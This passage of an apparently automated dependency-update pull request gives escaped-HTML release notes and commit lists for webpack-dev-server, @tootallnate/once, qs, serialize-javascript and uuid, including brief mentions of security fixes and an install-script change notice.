\u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.0...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@tootallnate/once` from 2.0.0 to 2.0.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/releases\"\u003e@​tootallnate/once's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/blob/v2.0.1/CHANGELOG.md\"\u003e@​tootallnate/once's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/bcbb21d387e5fb2d0bf8ec2fd8d0ac97d4553241\"\u003e\u003ccode\u003ebcbb21d\u003c/code\u003e\u003c/a\u003e ci: fix OIDC publishing — Node 24, npm latest, provenance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dc24387be8e3405f1e7c911caf76c87b72a0e145\"\u003e\u003ccode\u003edc24387\u003c/code\u003e\u003c/a\u003e Version Packages (2.x) (\u003ca href=\"https://redirect.github.com/TooTallNate/once/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b8a6f80afcfd2482b4bdb1e29d784340a05e0ce3\"\u003e\u003ccode\u003eb8a6f80\u003c/code\u003e\u003c/a\u003e CI: test all Node versions on Linux only\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dabcc0fb6202663cd83994f0a21ea1c710395327\"\u003e\u003ccode\u003edabcc0f\u003c/code\u003e\u003c/a\u003e ci: drop EOL Node.js 14.x/16.x, add 22.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b464efcf4238d92590245b4d211d2fc05a94d28a\"\u003e\u003ccode\u003eb464efc\u003c/code\u003e\u003c/a\u003e Update CI: modern Node versions, fix macOS ARM64 compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/a1e5e2d784bcd1c65e49fac1524c6c94fe81f871\"\u003e\u003ccode\u003ea1e5e2d\u003c/code\u003e\u003c/a\u003e Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/TooTallNate/once/compare/2.0.0...v2.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​tootallnate/once\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.13.0 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.0...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `serialize-javascript` from 6.0.1 to 6.0.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/yahoo/serialize-javascript/releases\"\u003eserialize-javascript's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev6.0.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: serialize URL string contents to prevent XSS (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/173\"\u003e#173\u003c/a\u003e)  f27d65d\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003e@​babel/traverse\u003c/code\u003e from 7.10.1 to 7.23.7 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/171\"\u003e#171\u003c/a\u003e)  02499c0\u003c/li\u003e\n\u003cli\u003edocs: update readme with URL support (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/146\"\u003e#146\u003c/a\u003e)  0d88527\u003c/li\u003e\n\u003cli\u003echore: update node version and lock file  e2a3a91\u003c/li\u003e\n\u003cli\u003efix typo (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/164\"\u003e#164\u003c/a\u003e)  5a1fa64\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2\"\u003ehttps://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/b71ec23841d7cf30847d3071d9da38ee0b397fc8\"\u003e\u003ccode\u003eb71ec23\u003c/code\u003e\u003c/a\u003e 6.0.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\"\u003e\u003ccode\u003ef27d65d\u003c/code\u003e\u003c/a\u003e fix: serialize URL string contents to prevent XSS (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/173\"\u003e#173\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/02499c0adfb40f48e1ebdcbe6fffc83b162b95e9\"\u003e\u003ccode\u003e02499c0\u003c/code\u003e\u003c/a\u003e Bump \u003ccode\u003e@​babel/traverse\u003c/code\u003e from 7.10.1 to 7.23.7 (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/0d885272f45069b1207189ae18a6f2726b4abaa9\"\u003e\u003ccode\u003e0d88527\u003c/code\u003e\u003c/a\u003e docs: update readme with URL support (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/e2a3a9173e6770ee92e02d95d6a8e7958dfb419d\"\u003e\u003ccode\u003ee2a3a91\u003c/code\u003e\u003c/a\u003e chore: update node version and lock file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yahoo/serialize-javascript/commit/5a1fa646d9cbbe0b4f13c07f01c249fb2493e20f\"\u003e\u003ccode\u003e5a1fa64\u003c/code\u003e\u003c/a\u003e fix typo (\u003ca href=\"https://redirect.github.com/yahoo/serialize-javascript/issues/164\"\u003e#164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/yahoo/serialize-javascript/compare/v6.0.1...v6.0.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 3.3.2 to 3.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v3.3.3...v3.4.0\"\u003e3.4.0\u003c/a\u003e (2020-01-16)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003erename repository to github:uuidjs/uuid (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/351\"\u003e#351\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2d7314\"\u003ee2d7314\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/338\"\u003e#338\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v3.3.2...v3.3.3\"\u003e3.3.3\u003c/a\u003e (2019-08-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eno longer run ci tests on node v4\u003c/li\u003e\n\u003cli\u003eupgrade dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3df73a98f07c0a38a94bcaf1ecde0e384dc3b126\"\u003e\u003ccode\u003e3df73a9\u003c/code\u003e\u003c/a\u003e chore(release): 3.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2d731463b680c5b816d144f66feef902586410e\"\u003e\u003ccode\u003ee2d7314\u003c/code\u003e\u003c/a\u003e feat: rename repository to github:uuidjs/uuid (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/351\"\u003e#351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e444323b6a2c3a70e5abbd0f60ea9dfbacab9188\"\u003e\u003ccode\u003ee444323\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/349\"\u003e#349\u003c/a\u003e from kelektiv/dependabot/npm_and_yarn/handlebars-4.5.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ac7a3f407a073a06f1a2f745903f89c6911e55d9\"\u003e\u003ccode\u003eac7a3f4\u003c/code\u003e\u003c/a\u003e chore(deps): bump handlebars from 4.1.2 to 4.5.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0b141e1560bdba80afb03309c78106ca9f353e04\"\u003e\u003ccode\u003e0b141e1\u003c/code\u003e\u003c/a\u003e Bump eslint-utils from 1.4.0 to 1.4.2 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/60eb84ac3be13f4cf37c8c62c86f1bc54e396ab1\"\u003e\u003ccode\u003e60eb84a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/335\"\u003e#335\u003c/a\u003e from 